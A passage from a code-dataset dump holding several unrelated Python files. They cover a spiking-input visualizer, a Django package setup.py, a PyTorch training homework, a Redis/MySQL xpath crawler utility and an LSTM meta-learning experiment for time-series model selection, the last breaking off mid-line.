input_spikes = to_spike_train(input, **to_st_train_kwargs)\n\n for idx in range(24):\n if labels[idx] == modulation_idx:\n img = None\n im3d = np.zeros((1024, wh, wh), dtype=np.uint8)\n for i in range(1024):\n\n im3d[i] = input_spikes[idx, i, 0, :, :]\n if False:\n ax[0].clear()\n ax[1].clear()\n if img is None:\n img = input_spikes[idx, i, 0, :, :]\n else:\n img += input_spikes[idx, i, 0, :, :]\n ax[0].imshow(img)\n ax[0].title.set_text(classes[labels[idx]])\n xx = input[idx, 0, i] * 2 - 1\n yy = input[idx, 1, i] * 2 - 1\n ax[1].scatter(xx, -1 * yy)\n ax[1].set_xlim(-1, 1)\n ax[1].set_ylim(-1, 1)\n plt.pause(0.0001)\n print(\"done\")\n pos = np.where(im3d == 1)\n fig2 = plt.axes(projection='3d')\n fig2.scatter3D(pos[0], pos[1], pos[2], c=pos[0])\n ys = np.arange(0,512)\n plt.figure()\n plt.plot(np.array(input[idx,0])[0:512],ys, 'g')\n plt.plot(np.array(input[idx,1])[0:512],ys, 'b')\n plt.pause(100)\n","sub_path":"rf2/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219375770","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# This document is free and open-source software, subject to the OSI-approved\n# BSD license below.\n#\n# Copyright (c) 2011 - 2013 Alexis Petrounias ,\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the author nor the names of its contributors may be used\n# to endorse or promote products derived from this software without specific\n# prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\nimport os\nfrom io import open\n\nfrom setuptools import find_packages, setup\n\n\ndef read(filename):\n path = os.path.join(os.path.dirname(__file__), filename)\n with open(path, encoding='utf-8') as handle:\n return handle.read()\n\n\nsetup(\n name='django-cte-forest',\n version=__import__('cte_forest').__version__,\n description=(\n 'Django Adjacency-List trees using PostgreSQL'\n ' Common Table Expressions (CTE).'\n ),\n long_description=read('README.rst'),\n maintainer='Matthias Kestenholz',\n maintainer_email='mk@feinheit.ch',\n url='https://github.com/matthiask/django-cte-forest',\n license='BSD License',\n packages=find_packages(\n exclude=['cte_forest_test'],\n ),\n include_package_data=True,\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"170908468","text":"import os\r\nimport sys\r\nimport torch\r\nimport torch.autograd as autograd\r\nimport torch.nn.functional as F\r\n\r\ndef save(model, save_dir, save_prefix, steps):\r\n if not os.path.isdir(save_dir):\r\n os.makedirs(save_dir)\r\n save_prefix = os.path.join(save_dir,save_prefix)\r\n save_path = '{}_steps_{}.pt'.format(save_prefix,steps)\r\n torch.save(model.state_dict(),save_path)\r\n\r\n\r\ndef train(train_iter, dev_iter, model, args):\r\n '''\r\n your code here.\r\n \r\n training process using backpropagation.\r\n print training loss and accuracy at args.log_interval.\r\n print evaluation loss and accuray at args.test_interval.\r\n Save the best model.\r\n \r\n Hint: view the size of data from train_iter before using them.\r\n Optional: Implement early stopping/dropout/L2 penalty.\r\n '''\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)\r\n steps = 0\r\n best_acc = 0\r\n last_step = 0\r\n model.train()\r\n for epoch in range(1, args.epochs+1):\r\n for batch in train_iter:\r\n feature, target = batch.text, batch.label\r\n #print(type(feature.data))\r\n #print(feature.data.shape)\r\n f = torch.t(feature.data) \r\n optimizer.zero_grad()\r\n logit = model(f)\r\n target.data = target.data-1\r\n loss = F.cross_entropy(logit, target)\r\n loss.backward()\r\n optimizer.step()\r\n steps += 1\r\n if steps % args.log_interval == 0:\r\n result = torch.max(logit,1)[1].view(target.size())\r\n corrects = (result.data == target.data).sum()\r\n accuracy = corrects*100.0/batch.batch_size\r\n sys.stdout.write('\\rBatch[{}] - loss: {:.6f} acc: {:.4f}%({}/{})'.format(steps,\r\n loss.data.item(),\r\n accuracy,\r\n corrects,\r\n batch.batch_size))\r\n if steps % args.log_interval == 0:\r\n dev_acc = eval(dev_iter, model, args)\r\n if dev_acc > best_acc:\r\n best_acc = dev_acc\r\n last_step = steps\r\n if args.save_best:\r\n save(model,args.save_dir,'best',steps)\r\n else:\r\n if steps - last_step >= args.early_stop:\r\n print('early stop by {} steps.'.format(args.early_stop))\r\n elif steps % args.save_interval == 0:\r\n save(model,args.save_dir,args.snapshot,steps)\r\n\r\n\r\ndef eval(dev_iter, model, args):\r\n '''\r\n your code here.\r\n evaluation of the model.\r\n \r\n Hint: To save the best model and do earily stopping,\r\n you need to return the evaluation accuracy to train function.\r\n '''\r\n model.eval()\r\n corrects, avg_loss = 0,0\r\n for batch in dev_iter:\r\n feature, target = batch.text, batch.label\r\n f = torch.t(feature.data) \r\n logit = model(f)\r\n target.data = target.data-1\r\n loss = F.cross_entropy(logit,target)\r\n avg_loss += loss.data.item()\r\n result = torch.max(logit,1)[1]\r\n corrects += (result.view(target.size()).data == target.data).sum()\r\n size = len(dev_iter.dataset)\r\n avg_loss /= size \r\n accuracy = 100.0 * corrects/size\r\n print('\\nEvaluation - loss: {:.6f} acc: {:.4f}%({}/{}) \\n'.format(avg_loss,accuracy,corrects,size))\r\n \r\n return accuracy\r\n\r\n\r\n","sub_path":"homework5/YulinChen/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"387359611","text":"# Попросить пользователя ввести слово только из букв.\n\ndef enter_word():\n while True:\n s = input(\"Please enter an alphabetic word.\\n\")\n s = s.strip()\n if s.isalpha():\n return s\n\n\nword = enter_word()\nassert word.isalpha(), \"Word is not alphabetic.\"\nprint(word)\n\n","sub_path":"Practice1.py","file_name":"Practice1.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"504271677","text":"# -*- encoding: utf-8 -*-\n'''\nCreated on 2017/7/1 13:49\nCopyright (c) 2017/7/1, 海牛学院版权所有.\n@author: 青牛\n'''\nimport sys\n\nsys.path.append('/home/qingniu/hainiu_crawler')\n\nfrom commons.util.db_util import DBUtil\nfrom commons.util.log_util import LogUtil\nfrom commons.util.file_util import FileUtil\nfrom commons.util.time_util import TimeUtil\nfrom hdfs.client import Client\nfrom configs import config\nimport time, sys, redis\n\n\ndef xpath_config_file():\n select_xpath_rule_sql = \"\"\"select host,xpath,type from stream_extract_xpath_rule where host='%s' and status=0\"\"\"\n rl = LogUtil().get_base_logger()\n try:\n # _HAINIU_DB = {'HOST': '192.168.137.190', 'USER': 'hainiu', 'PASSWD': '12345678', 'DB': 'hainiucrawler',\n # 'CHARSET': 'utf8', 'PORT': 3306}\n d = DBUtil(config._HAINIU_DB)\n #d = DBUtil(_HAINIU_DB)\n r = redis.Redis('nn1.hadoop', 6379, db=6)\n #r = redis.Redis('redis.hadoop', 6379, db=6)\n f = FileUtil()\n t = TimeUtil()\n c = Client(\"http://nn1.hadoop:50070\")\n\n time_str = t.now_time(format='%Y%m%d%H%M%S')\n #local_xpath_file_path = '/Users/leohe/Data/input/xpath_cache_file/xpath_file' + time_str\n local_xpath_file_path = '/home/qingniu/xpath_cache_file/xpath_file' + time_str\n\n start_cursor = 0\n is_finish = True\n starttime = time.clock()\n host_set = set()\n\n while is_finish:\n values = set()\n limit = r.scan(start_cursor,'total:*',10)\n if limit[0] == 0:\n is_finish = False\n start_cursor = limit[0]\n for h in limit[1]:\n host = h.split(\":\")[1]\n total_key = h\n txpath_key = 'txpath:%s' % host\n fxpath_key = 'fxpath:%s' % host\n total = r.get(total_key)\n\n txpath = r.zrevrange(txpath_key, 0, 1)\n row_format = \"%s\\t%s\\t%s\\t%s\"\n if txpath:\n # print 'txpath:%s' % txpath\n txpath_num = int(r.zscore(txpath_key, txpath[0]))\n if txpath.__len__() == 2:\n txpath_num_1 = int(r.zscore(txpath_key, txpath[1]))\n txpath_num_1 = txpath_num_1 if txpath_num_1 is not None else 0\n\n # print 'txpath_max_num:%s' % txpath_num\n if txpath_num / float(total) >= 0.8:\n values.add(row_format % (host, txpath[0], 'true', '0'))\n host_set.add(host)\n else:\n if txpath_num >= 1:\n values.add(row_format % (host, txpath[0], 'true', '0'))\n host_set.add(host)\n if txpath_num_1 is not None and txpath_num_1 >= 1:\n values.add(row_format % (host, txpath[1], 'true', '0'))\n host_set.add(host)\n\n fxpath = r.smembers(fxpath_key)\n if fxpath:\n # print 'fxpath:%s' % fxpath\n for fx in fxpath:\n values.add(row_format % (host, fx, 'false', '0'))\n host_set.add(host)\n\n sql = select_xpath_rule_sql % host\n list_rule = d.read_tuple(sql)\n for rule in list_rule:\n type = rule[2]\n if type == 0:\n values.add(row_format % (rule[0], rule[1], 'true', '2'))\n host_set.add(host)\n elif type == 1:\n values.add(row_format % (rule[0], rule[1], 'false', '3'))\n host_set.add(host)\n\n f.write_file_line_pattern(local_xpath_file_path, values, \"a\")\n #上传到HDFS的XPATH配置文件目录\n c.upload(\"/user/qingniu/xpath_cache_file/\", local_xpath_file_path)\n endtime = time.clock()\n worksec = int(round((endtime - starttime)))\n rl.info('total host %s,action time %s\\'s' % (host_set.__len__(), worksec))\n except:\n rl.exception()\n d.rollback()\n finally:\n d.close()\n\n\nif __name__ == '__main__':\n reload(sys)\n sys.setdefaultencoding('utf-8')\n xpath_config_file()\n","sub_path":"src/main/resources/xpath_config.py","file_name":"xpath_config.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"548417195","text":"import pandas as pd\nimport os\nimport simplejson as json\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom sklearn.cluster import KMeans\nfrom sklearn.neighbors import NearestNeighbors\nimport sklearn\nfrom sklearn import preprocessing\nfrom numpy import inf\nfrom sklearn.decomposition import PCA\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import LSTM\nfrom tensorflow.keras.layers import Dropout\nimport time\n\n# linear regression for multioutput regression\nfrom sklearn.datasets import make_regression\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge \n\n## Calculating Average. value of a list\ndef Average_val(lst):\n return sum(lst) / len(lst)\n\n## Normalizing feature vectors\ndef Normalize_feature(feat_df, PCA_option): \n if PCA_option == 'No':\n x = feat_df #.values \n else:\n x = feat_df \n min_max_scaler = preprocessing.MinMaxScaler()\n x_scaled = min_max_scaler.fit_transform(x)\n res = pd.DataFrame(x_scaled)\n \n return res\n\n### Check about empty files of a directory \ndef Check_Empty_Files(dirName):\n \n # Create a List \n listOfEmptyDirs = list()\n\n # Iterate over the directory tree and check if directory is empty.\n for (dirpath, dirnames, filenames) in os.walk(dirName):\n if len(dirnames) == 0 and len(filenames) == 0 :\n listOfEmptyDirs.append(dirpath)\n\n### Get Meta-Features matrix for the training and testing \ndef Get_Meta_Features (meta_feat_dir, data_list, data_type):\n \n df_meta_feat = pd.DataFrame()\n \n if data_type == 'Uni-var':\n \n for file_name in data_list:\n print(file_name)\n df = pd.read_csv(meta_feat_dir + file_name +'.csv', error_bad_lines=False, header = None)\n last_row = df.tail(1)\n df_meta_feat = df_meta_feat.append(last_row, ignore_index=True)\n df_meta_feat = df_meta_feat.fillna(0)\n \n \n return df_meta_feat\n\n '''\n else: \n for file_name in all_datasets_list:\n cnt = 0\n results_vec = []\n if '.DS_Store' not in file_name:\n cnt += 1\n all_models_list = os.listdir(win_res_dir_name + '/' + dir_name + '/' + file_name) \n \n \n for model_name in all_models_list:\n df = pd.read_csv(win_res_dir_name + '/' + dir_name+'/'+file_name+'/'+model_name, error_bad_lines=False, header = None)\n results_vec.append(df.iloc[0,-1])\n \n best_model_dataset_index = results_vec.index(min(results_vec))\n print(file_name + ':' + arr_models[best_model_dataset_index + 1])\n \n ## Append Best Model for each dataset variable to the vector\n a.append(best_model_dataset_index + 1)\n \n results_vec.insert(0,dir_name+'_'+file_name)\n \n numpy_perf_vec = np.array(results_vec).reshape((1, len(all_models_list)+1)) \n numpy_perf_list = numpy_perf_vec.tolist()\n \n wtr_perf.writerow (numpy_perf_list)\n \n return a \n''' \n \n### Get the best model for specific dataset (Used for ALgros baseline)\ndef Get_All_Model_Dataset(data_name, win_res_dir_name, data_type):\n \n arr_models = os.listdir(win_res_dir_name + '/' + data_name)\n \n all_models_list = os.listdir(win_res_dir_name + '/' + data_name) \n \n results_vec_mse = []\n results_vec_mape = []\n results_vec_smape = []\n for model_name in all_models_list:\n df = pd.read_csv(win_res_dir_name + '/' + data_name+'/'+ model_name, error_bad_lines=False, header = None)\n results_vec_mse.append(df.iloc[0,-1])\n results_vec_mape.append(df.iloc[1,-1])\n results_vec_smape.append(df.iloc[2,-1]) \n \n \n return results_vec_mse, results_vec_mape, results_vec_smape, arr_models\n \n### (a) Gloal Best Implementation\ndef Global_Best (dir_list, data_list, data_type):\n Models_Array_mse = [] \n Models_Array_mape = []\n Models_Array_smape = [] \n for data_name in data_list:\n for win_ind in os.listdir(dir_list):\n if '.DS_Store' not in win_ind:\n print(data_name)\n ##### Get Performance Matrix and Best Model Array for both Multi-variate and Uni-variate Datasets with a specific window\n if data_type == 'Uni-var':\n results_vec_mse = []\n results_vec_mape = []\n results_vec_smape = []\n \n all_models_list = os.listdir(dir_list + win_ind + '/' + data_name) \n for model_name in all_models_list:\n df = pd.read_csv(dir_list + win_ind + '/' + data_name + '/' + model_name, error_bad_lines=False, header = None)\n results_vec_mse.append(df.iloc[0,-1])\n results_vec_mape.append(df.iloc[1,-1])\n results_vec_smape.append(df.iloc[2,-1])\n \n best_model_dataset_index_mse = results_vec_mse.index(min(results_vec_mse))\n best_model_dataset_index_mape = results_vec_mape.index(min(results_vec_mape))\n best_model_dataset_index_smape = results_vec_smape.index(min(results_vec_smape))\n \n \n ## Append Best Model for each dataset variable to the vector\n Models_Array_mse.append(best_model_dataset_index_mse)\n Models_Array_mape.append(best_model_dataset_index_mape)\n Models_Array_smape.append(best_model_dataset_index_smape)\n\n \n d_mse = defaultdict(int)\n for i in Models_Array_mse:\n d_mse[i] += 1\n result_mse = max(d_mse.items(), key=lambda x: x[1])\n \n d_mape = defaultdict(int)\n for i in Models_Array_mape:\n d_mape[i] += 1\n result_mape = max(d_mape.items(), key=lambda x: x[1])\n \n d_smape = defaultdict(int)\n for i in Models_Array_smape:\n d_smape[i] += 1\n result_smape = max(d_smape.items(), key=lambda x: x[1])\n \n return all_models_list[result_mse[0]], all_models_list[result_mape[0]], all_models_list[result_smape[0]]\n \n### Get Average Performance of Models across dataset cluster (Used for ISAC baseline)\ndef Get_Best_Avg_Model_Dataset(data_cluster, win_res_dir_name, data_type):\n \n results_vec_mse_avg = [0] * 322\n results_vec_mape_avg = [0] * 322\n results_vec_smape_avg = [0] * 322\n \n for data_name in data_cluster:\n \n results_vec_mse = []\n results_vec_mape = []\n results_vec_smape = []\n \n arr_models = os.listdir(win_res_dir_name + '/' + data_name)\n all_models_list = os.listdir(win_res_dir_name + '/' + data_name) \n \n for model_name in all_models_list:\n df = pd.read_csv(win_res_dir_name + '/' + data_name+'/'+ model_name, error_bad_lines=False, header = None)\n \n results_vec_mse.append(df.iloc[0,-1])\n results_vec_mape.append(df.iloc[1,-1])\n results_vec_smape.append(df.iloc[2,-1]) \n \n results_vec_mse_avg += results_vec_mse\n results_vec_mape_avg += results_vec_mape\n results_vec_smape_avg += results_vec_smape \n \n best_model_dataset_index_mse_avg = results_vec_mse_avg.index(min(results_vec_mse_avg))\n best_model_dataset_index_mape_avg = results_vec_mape_avg.index(min(results_vec_mape_avg))\n best_model_dataset_index_smape_avg = results_vec_smape_avg.index(min(results_vec_smape_avg))\n \n \n return arr_models[best_model_dataset_index_mse_avg], arr_models[best_model_dataset_index_mape_avg], arr_models[best_model_dataset_index_smape_avg] \n\n### Get the best model for specific dataset (Used for ALgros baseline)\ndef Get_Best_Model_Dataset(data_name, win_res_dir_name, data_type):\n \n arr_models = os.listdir(win_res_dir_name + '/' + data_name)\n arr_models.insert(0,'Dataset')\n \n all_models_list = os.listdir(win_res_dir_name + '/' + data_name) \n \n \n results_vec_mse = []\n results_vec_mape = []\n results_vec_smape = []\n for model_name in all_models_list:\n df = pd.read_csv(win_res_dir_name + '/' + data_name+'/'+ model_name, error_bad_lines=False, header = None)\n results_vec_mse.append(df.iloc[0,-1])\n results_vec_mape.append(df.iloc[1,-1])\n results_vec_smape.append(df.iloc[2,-1]) \n \n \n best_model_dataset_index_mse = results_vec_mse.index(min(results_vec_mse))\n best_model_dataset_index_mape = results_vec_mape.index(min(results_vec_mape))\n best_model_dataset_index_smape = results_vec_smape.index(min(results_vec_smape))\n \n \n return arr_models[best_model_dataset_index_mse + 1], arr_models[best_model_dataset_index_mape + 1], arr_models[best_model_dataset_index_smape + 1]\n \n#### Get Model Files list from a dataset directory\ndef Get_Model_Files_List(win_res_dir_name, data_type):\n \n dir_datasets_name = os.listdir(win_res_dir_name) \n for dir_name in dir_datasets_name:\n \n if '.DS_Store' in dir_name:\n continue\n \n if data_type == 'Uni-var':\n all_models_list = os.listdir(win_res_dir_name+'/'+dir_name)\n \n else:\n all_datasets_list = os.listdir(win_res_dir_name+'/'+dir_name) \n \n for file_name in all_datasets_list:\n if '.DS_Store' not in file_name:\n all_models_list = os.listdir(win_res_dir_name+'/'+dir_name+'/'+file_name) \n \n \n return all_models_list \n\n#### Draw and Save Histogram for the best models\ndef Histogram_plot_save(window_best_models_arr):\n \n _ = plt.hist(window_best_models_arr, bins= 'auto', density = True) # arguments are passed to np.histogram\n plt.title(\"Histogram of Best Models for Training Dataset\", fontsize=12)\n plt.xlabel(\"Forecasting Model Index\", fontsize=12)\n plt.ylabel(\"Probability of being Best Model\", fontsize=12)\n plt.xticks(fontsize=12)\n plt.yticks(fontsize=12)\n plt.tick_params(axis='both', which='minor', labelsize=12)\n plt.savefig('hist_best_models.eps', format='eps')\n plt.show()\n \ndef chunks(l, n):\n n = max(1, n)\n return [l[i:i+n] for i in range(0, len(l), n)]\n\n### Get Difference between two lists\ndef Diff(li1, li2): \n return (list(set(li1) - set(li2)))\n\n#### Divide the datasets into 5 folds for training and testing \ndef Divide_Dataset_Folds(n_folds, datasets_dir_list):\n \n train_folds_list = []\n test_folds_list = []\n\n length = int(len(datasets_dir_list)/ n_folds) #length of each fold\n folds = []\n for i in range(n_folds-1):\n folds += [datasets_dir_list[i*length:(i+1)*length]]\n folds += [datasets_dir_list[4*length:len(datasets_dir_list)]]\n \n print(folds)\n \n for fold in folds: \n train_folds_list.append(Diff(datasets_dir_list, fold))\n test_folds_list.append(fold)\n\n\n return train_folds_list, test_folds_list \n \n\nif __name__ == '__main__':\n \n n_folds = 5\n PCA_option = 'Yes' #Yes\n n_components = 3 ## If PCA_option is Yes, the n_components\n \n ## Folds for MV datasets\n mv_dir = 'results_all_mv/Multi-variate_first_win/'\n dir_mv_list = os.listdir(mv_dir)\n dir_mv_list.remove('.DS_Store')\n train_folds_list_mv, test_folds_list_mv = Divide_Dataset_Folds(n_folds, dir_mv_list) ## Division of folds by dataset names\n \n ''' \n ## Folds for UV datasets\n uv_dir_1 = 'results_all_mv/Multi-variate_first_win/'\n uv_dir_2 = 'results_all_mv/Multi-variate_second_win'\n uv_dir_3 = 'results_all_mv/Multi-variate_third_win'\n dir_uv_list = os.listdir(uv_dir_1)\n dir_uv_list.remove('.DS_Store')\n train_folds_list_uv, test_folds_list_uv = Divide_Dataset_Folds(n_folds, dir_uv_list) ## Division of folds by dataset names\n \n \n #### Go across the folds and evaluate the different baselines and then average\n meta_feat_dir_1 = 'Meta-Features/Meta-Feat_first_win/Multi_Variate_Real_first_win/'\n meta_feat_dir_2 = 'Meta-Features/Meta-Feat_sec_win/Multi_Variate_Real_sec_win/'\n meta_feat_dir_3 = 'Meta-Features/Meta-Feat_third_win/Multi_Variate_Real_third_win/'\n \n '''\n \n #### Directories for perfromances results for all other windows \n uv_dir_1 = 'results_all_uv/Uni-variate_first_win/' \n uv_dir_2 = 'results_all_uv/Uni-variate_second_win'\n uv_dir_3 = 'results_all_uv/Uni-variate_third_win'\n dir_uv_list = os.listdir(uv_dir_1)\n dir_uv_list.remove('.DS_Store')\n train_folds_list_uv, test_folds_list_uv = Divide_Dataset_Folds(n_folds, dir_uv_list) ## Division of folds by dataset names\n \n #print('UV<<<<') #print(train_folds_list_uv) #print(test_folds_list_uv)\n \n \n #### Go across the folds and evaluate the different baselines and then average\n meta_feat_dir_1 = 'Meta-Features/Meta-Feat_first_win/Uni-Variate_first_win/'\n meta_feat_dir_2 = 'Meta-Features/Meta-Feat_sec_win/Uni-Variate_sec_win/'\n meta_feat_dir_3 = 'Meta-Features/Meta-Feat_third_win/Uni-Variate_third_win/'\n \n \n final_vec_all_folds = []\n cnt_k_all = 0\n train_time_vec = []\n \n for i in range(0, n_folds):\n \n \n train_X_mse = pd.DataFrame()\n test_X_mse = pd.DataFrame()\n train_Y_mse = pd.DataFrame()\n test_Y_mse = pd.DataFrame()\n predicted_mse = pd.DataFrame()\n \n train_Y_mape = []; train_Y_smape = []\n \n ### Extract Meta-Features\n ## (1) Train Meta-features\n meta_features_train_orig_1 = Get_Meta_Features (meta_feat_dir_1, train_folds_list_uv[i], 'Uni-var')\n meta_features_train_orig_2 = Get_Meta_Features (meta_feat_dir_2, train_folds_list_uv[i], 'Uni-var')\n meta_features_train_orig_3 = Get_Meta_Features (meta_feat_dir_3, train_folds_list_uv[i], 'Uni-var')\n \n meta_features_train_orig_par = meta_features_train_orig_1.append(meta_features_train_orig_2, ignore_index=True)\n meta_features_train_orig = meta_features_train_orig_par.append(meta_features_train_orig_3, ignore_index=True)\n \n ## Perform PCA for Training\n pca = PCA(n_components)\n pca.fit(meta_features_train_orig)\n meta_features_train_pca = pca.transform(meta_features_train_orig)\n #print(pca.explained_variance_ratio_)\n \n #print(meta_features_train_orig)\n #print(meta_features_train_pca)\n \n ## Normalize Features\n if PCA_option == 'No':\n meta_features_train = Normalize_feature(meta_features_train_orig, PCA_option)\n else: \n meta_features_train = Normalize_feature(meta_features_train_pca, PCA_option)\n \n print('Normalized Train Features')\n print(meta_features_train)\n \n ## (1) Test Meta-features\n meta_features_test_orig_1 = Get_Meta_Features (meta_feat_dir_1, test_folds_list_uv[i], 'Uni-var')\n meta_features_test_orig_2 = Get_Meta_Features (meta_feat_dir_2, test_folds_list_uv[i], 'Uni-var')\n meta_features_test_orig_3 = Get_Meta_Features (meta_feat_dir_3, test_folds_list_uv[i], 'Uni-var')\n \n meta_features_test_orig_par = meta_features_test_orig_1.append(meta_features_test_orig_2, ignore_index=True)\n meta_features_test_orig = meta_features_test_orig_par.append(meta_features_test_orig_3, ignore_index=True)\n \n ## Perform PCA for Testing\n pca = PCA(n_components)\n pca.fit(meta_features_test_orig)\n meta_features_test_pca = pca.transform(meta_features_test_orig)\n #print(pca.explained_variance_ratio_)\n \n ## Normalize Features\n if PCA_option == 'No':\n meta_features_test = Normalize_feature(meta_features_test_orig, PCA_option)\n else: \n meta_features_test = Normalize_feature(meta_features_test_pca, PCA_option)\n \n print('Normalized Test Features') \n print(meta_features_test)\n \n \n ## (B) Time-Series Meta-learner \n j = 0\n for train_data_name in train_folds_list_uv[i]: ## Append all of the first window performances \n \n train_X_mse_1 = [];train_X_mse_2 = [];train_X_mse_3 = []; \n train_Y_mse_1 = []; train_Y_mse_2 = [];train_Y_mse_3 = [];\n \n \n ## Collect Performances for that dataset\n results_vec_mse_1, results_vec_mape_1, results_vec_smape_1, arr_models = Get_All_Model_Dataset(train_data_name, uv_dir_1, 'Uni-var')\n results_vec_mse_2, results_vec_mape_2, results_vec_smape_2, arr_models = Get_All_Model_Dataset(train_data_name, uv_dir_2, 'Uni-var')\n results_vec_mse_3, results_vec_mape_3, results_vec_smape_3, arr_models = Get_All_Model_Dataset(train_data_name, uv_dir_3, 'Uni-var') \n \n \n ## First Window History features and performances\n train_X_mse_1.extend(meta_features_train.iloc[j,:])\n train_X_mse_1.extend([0] * 322)\n if PCA_option == 'No':\n train_X_mse_1.extend([0] * meta_features_train_orig_2.shape[1])\n else:\n train_X_mse_1.extend([0] * n_components)\n train_X_mse_1.extend([0] * 322)\n print('TRAIN_X After first window')\n #print(len(train_X_mse_1))\n \n a_series = pd.Series(train_X_mse_1)\n train_X_mse = train_X_mse.append(a_series, ignore_index=True)\n #print(train_X_mse)\n \n print('TRAIN_Y After first window')\n train_Y_mse_1.extend(results_vec_mse_1)\n #print(len(train_Y_mse_1))\n \n ## Appending the first raw to the train_Y dataframe \n a_series = pd.Series(train_Y_mse_1)\n train_Y_mse = train_Y_mse.append(a_series, ignore_index=True)\n #print(train_Y_mse)\n \n \n ## Second Window History features and performances\n train_X_mse_2.extend(meta_features_train.iloc[j,:])\n train_X_mse_2.extend(results_vec_mse_1)\n if PCA_option == 'No':\n train_X_mse_2.extend([0] * meta_features_train_orig_2.shape[1])\n else:\n train_X_mse_2.extend([0] * n_components)\n train_X_mse_2.extend([0] * 322) \n print('TRAIN_X After second window')\n #print(len(train_X_mse_2))\n \n a_series = pd.Series(train_X_mse_2)\n train_X_mse = train_X_mse.append(a_series, ignore_index=True)\n #print(train_X_mse)\n \n ## Appending the second raw to the train_X dataframe \n train_Y_mse_2.extend(results_vec_mse_2)\n print('TRAIN_Y After second window')\n #print(len(train_Y_mse_2))\n \n a_series = pd.Series(train_Y_mse_2)\n train_Y_mse = train_Y_mse.append(a_series, ignore_index=True)\n #print(train_Y_mse)\n \n \n ## Third Window History features and performances\n train_X_mse_3.extend(meta_features_train.iloc[j,:])\n train_X_mse_3.extend(results_vec_mse_1)\n train_X_mse_3.extend(meta_features_train.iloc[j+len(train_folds_list_uv[i]),:])\n train_X_mse_3.extend(results_vec_mse_2)\n print('TRAIN_X After third window')\n #print(len(train_X_mse_3))\n \n ## Appending the third raw to the train_X dataframe \n a_series = pd.Series(train_X_mse_3)\n train_X_mse = train_X_mse.append(a_series, ignore_index=True)\n print(train_X_mse)\n \n \n ## Appending the third raw to the train_Y dataframe \n train_Y_mse_3.extend(results_vec_mse_3)\n print('TRAIN_Y After third window')\n #print(len(train_Y_mse_3))\n \n a_series = pd.Series(train_Y_mse_3)\n train_Y_mse = train_Y_mse.append(a_series, ignore_index=True)\n print(train_Y_mse)\n \n j += 1\n \n \n print(train_X_mse) \n print(train_Y_mse) \n \n # Fit Model for MSE Performance Metric \n #model_ts_mse = LinearRegression(positive = True) ## normalize = True \n #model_ts_mse = Ridge(alpha = 1.0)\n \n ## Start Time for Training\n start_time = time.time()\n \n \n ## Creating RNN to model TS model\n train_X_mse = np.array(train_X_mse)\n train_X_mse = np.reshape(train_X_mse, (train_X_mse.shape[0], train_X_mse.shape[1], 1)) \n \n \n model_ts_mse = Sequential()\n print(train_X_mse.shape[1])\n model_ts_mse.add(LSTM(units = 50, return_sequences = True, input_shape = (train_X_mse.shape[1], 1)))\n model_ts_mse.add(Dropout(0.2)) ## Drop Out Regularization\n ## Adding Three More LSTM Layers\n for p in [True, True, False]: # 2 layers\n model_ts_mse.add(LSTM(units = 50, return_sequences = p))\n model_ts_mse.add(Dropout(0.2))\n \n ## Adding the output layer\n print(train_Y_mse.shape[1]) \n model_ts_mse.add(Dense(units = train_Y_mse.shape[1]))\n \n ## Compiling the RNN \n model_ts_mse.compile(optimizer = 'adam', loss = 'mean_squared_error')\n \n ## Fitting the RNN \n model_ts_mse.fit(train_X_mse, train_Y_mse, epochs = 40, batch_size = 50)\n \n \n AFY_train_time_seconds = time.time() - start_time \n print('AF-Y Train Time: '+ str(AFY_train_time_seconds))\n \n train_time_vec.append(AFY_train_time_seconds) \n \n print('Train_Time_Vector_After_Fold ' + str(i))\n print(train_time_vec)\n \n #model_ts_mse.fit(train_X_mse, 